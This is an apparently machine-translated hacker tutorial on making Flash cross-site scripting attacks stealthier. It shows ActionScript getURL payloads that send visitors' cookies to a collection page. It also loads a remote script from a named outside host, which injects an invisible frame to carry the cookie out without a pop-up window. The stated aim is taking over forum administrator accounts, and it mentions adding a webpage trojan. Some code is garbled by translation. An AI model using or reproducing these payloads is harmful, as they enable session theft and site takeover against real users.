How to prevent cross-site Flash attack pop-up IE window

I 've been busy learning WIN32 compilation a few days ago and have been too reluctant to write articles. These days, it seems like Flash cross-site attacks are fierce, however, the pop-up IE window during Flash cross-site attack can easily cause suspicion, and the Flash cross-site attack fails, which is indeed a little headache, are you always looking for ways to hide your attack behavior without popping up the IE window when implementing Flash cross-site attacks? The following experts and I will solve this problem, making Flash cross-site attacks more perfect!

In general, when you conduct cross-site Flash attacks, you will make a Flash animation by yourself, and add the AtionScript function to jump to other URLs in the first frame, as shown below:

GetURL ("JavaScript: window. open (http: // the address of the webpage used to collect cookies? + Document. cookie) "," _ self ")

Then, place the Flash Animation in the signature, post, or text message in the forum to obtain the Cookie of the administrator or user, so as to obtain the management permission and further control the entire site, ultimately achieve your goal. We can see that the most important cross-site attack is the AtionScript script! That is, the code used in this script opens a window that we love and hate. Therefore, we can only transform the script code to hide or remove the pop-up IE window, there is no other way!

First, let's analyze the above AtionScript script, which uses the AtionScript Script Function "getURL" to jump to a URL using the JavaScript Protocol (the JavaScript protocol is followed by the JavaScript script code we are very familiar ), use document. cookie, connect the Cookie with the web address used to collect the Cookie into an http URL address, and use window. open the merged URL address, send the Cookie to the webpage used to collect the Cookie in GET mode, and record it.

Through the above analysis, we further understand that the pop-up IE window is caused by the code window in the JavaScript protocol. we believe all of you know what open generates. the second parameter of open is used to specify the name of the window to open. The common name is "_ media (IE6.0 is opened in the media panel on the left of the browser) "," _ blank (opened in a new window) ", and" _ parent (opened in the parent framework of the current framework. If the current framework has no parent framework, this parameter value is equivalent to _ self) "and" _ search (IE5.0 is opened in the search panel on the left of the browser) "," _ self (open in the current window, overwrite the current document) "," _ top (open in the top-level window outside all frameworks. If the current window has no frame structure, the value of this parameter is equivalent to _ self). If we use "_ search" to open the window, will the pop-up IE window disappear? Change the AtionScript script:

GetURL ("JavaScript: window. open (http: // the address of the webpage used to collect cookies? + Document. cookie, _ search) "," _ self ")

Of course, this will open the search panel and cause suspicion, but it can be avoided by the software that closes the pop-up window! That's just a way!

If it's just what I said above, I believe many readers will take me ......

If you are smart here, do you think of a solution? Yes! Since JavaScript is supported, what else cannot be solved? JavaScript is actually a lot of benefit!

If you have read my article "Creating a perfect IE webpage Trojan" and have a deep understanding of the code, you can imagine it first! Haha ......

The article contains the following code:

Jsurl = "http://www.godog.y365.com/wodemuma/icyfox.js". replace (// g ,//);

Window. open ("file: javascript: document. all. tags (SCRIPT) [0]. src =" + jsurl + "; eval ();", "icyfoxlovelace ");

The javascript protocol is used to insert a js Code file on your website into a local file, in the same way, we can also use it to insert a js Code file into the Forum webpage for Cross-Site attacks. The corresponding AtionScript script is changed:

GetURL ("JavaScript: document. all. tags (SCRIPT) [0]. src = http://www.godog.y365.com/wodemuma/icyfox.js;eval ();", "_ self ")

The contents of icyfox. js are as follows:

Cookieurl = "http: // the address of the web page used to collect cookies? Cookie = "+ escape (document. cookie );

/* Escape () is used to encode the cookie to prevent some special characters in the cookie */

Document. body. insertAdjacentHTML (beforeEnd ,);

/* InsertAdjacentHTML is used here to insert an invisible frame at the end of the body */

Here we mainly use javascript code documents that can be introduced into different domains on a webpage, And the javascript code documents introduced will be integrated with the webpage!

Okay! So far, the pop-up IE window of Flash cross-site attack is a solution! Of course, I have nothing to say if you want to add a webpage trojan in icyfox. js!

Finally, by the way, it can also be used to hide the pop-up IE window by hitting other types of XSS! Compared with Microsoft. the XMLHTTP Control sends more cookies at will because it is not similar to Microsoft. the XMLHTTP control can only be sent to the current server, and czy in the focus "uses Microsoft. the XMLHTTP Control sends a COOKIE:

"In the past, I thought about how to use the insertAdjacentHTML method on the webpage to inject HTML statements. The method barely allowed sending cookies without the IE window, but sometimes I encountered an IE error in actual use. "

Some special characters exist in cookies, and czy does not properly process or encode them. In actual use, sometimes I encounter IE errors, therefore, the above Code uses escape () to encode the cookie. After receiving the cookie, please use unescape () to decode it!